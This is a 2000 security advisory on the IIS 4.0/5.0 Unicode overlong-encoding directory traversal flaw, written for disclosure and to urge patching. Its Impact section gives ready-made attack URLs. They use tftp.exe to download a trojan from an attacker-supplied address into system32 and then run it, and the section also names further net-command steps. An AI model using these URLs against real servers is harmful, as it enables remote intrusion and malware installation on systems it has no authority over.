=====================================================================
Securax-SA-06 Security Advisory
belgian.networking.security Dutch
=====================================================================
Topic: Ms Windows IIS4.0 - 5.0 allows executing commands
and uploading files using TFTP and SAMBA.
Announced: 2000-10-23
Updated: 2000-10-24
Affects: IIS 4.0, 5.0
None affected: Apache, IIS 3.0
Obsoletes: /
=====================================================================

THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR
RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS
100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
NOTICE.
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING
THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ.
THANK YOU,



I. Background
As mentioned in other advisories, remote users can execute any
command on several IIS 4.0 and 5.0 systems by using overlong
unicode representations for ../
What are these overlong unicode representations? Unicode v2.0
allows multiple encoding possibilities for each character, for
instance:
2f
c0 af
e0 80 af
f0 80 80 af
f8 80 80 80 af
fc 80 80 80 80 af
... are all some of the possible representations for "/". A good
unicode decoder should disallow all representations with a hex
value larger then the smallest possible representation to avoid
problems with filtering.
This is where things go wrong in IIS4.0 and 5.0, IIS first scans the
given url for ../ and ..\ and for the normal unicode of these
strings, if those are found, the string is rejected, if these are
not found, the string will be decoded and interpreted. IIS first
filtering and then decoding can be derived from the differences in
error.log and acces.log when it comes to handling encoded urls.
Since the filter does NOT check for the huge amount of overlong
unicode representations of ../ and ..\ the filter is bypassed and
the directory traversalling routine is invoked. Until now, only
servers that have the /wwwroot/ dir on the same partition as the as
the WINNT dir seem to be vulnerable.
(Although we noticed that for some reason if an inactive
/Inetpub/wwwroot/ exists on the c: drive, you will be able to
run commands even if the active wwwroot is on the d: drive)
Exploiting this bug is quite easy, but using pipes (>|<) always
causes a 500 server error, without these quotes, we cannot use
interactive standard NT executables like ftp or telnet or, by using
ftp.exe < script and we cannot create files with custom contents by
using echo "blah blah" > filename.
Thus we are limited to viewing, deleting and copying files, not
changing the contents of files or running our very own trojan.




II. Problem Description
Anonymous, remote ( IUSR_xxxxx ) users can view, copy, delete, md
and issue other non-ACL protected commands from their browser
windows. The possibilities even include uploading trojans and
other hostile codes, viewing .asp files, ...



III. Impact

By using tftp.exe that comes with NT and win2k by connecting and
downloading a trojan from a tftp daemon you can bypass these
restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip >
and connect from your compromised to your local machine using the
command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".
You van do so wiith this url:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
then all you have to do is run the trojan with:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

You might also use the samba commands: "net share and net user"
on the target and "net use" on the local machine... but this does
not always seem to work. (coz. netbios is not installed?)

IV. Solution
This *should* get patched asap, since a lot of servers seen to be
vulnerable. The possibilities on this exploit are bigger than meets
the eye, and we all had our share of warnings when the msadc exploded
in our faces. This vulnerability is serious, so patch this as soon
as possible.


V. Credits
UNICODE decoding flaw posted to packetstorm forum by an unknown
author. <Zoa_chien@securax.org> for the Samba tryout and writeup
<vorlon@securax.org> for the TFTP.



VI. Source code
http://www.unixandbeer.com/reggie/IIS4-5.exe
http://packetstorm.securify.com/0010-exploits/iisex.c

recommended reading (unicode):
http://www.unicode.org/charts/PDF/
http://home.sch.bme.hu/~kisza/secure-programs/x401.html
http://www.cl.cam.ac.uk/~mgk25/unicode.html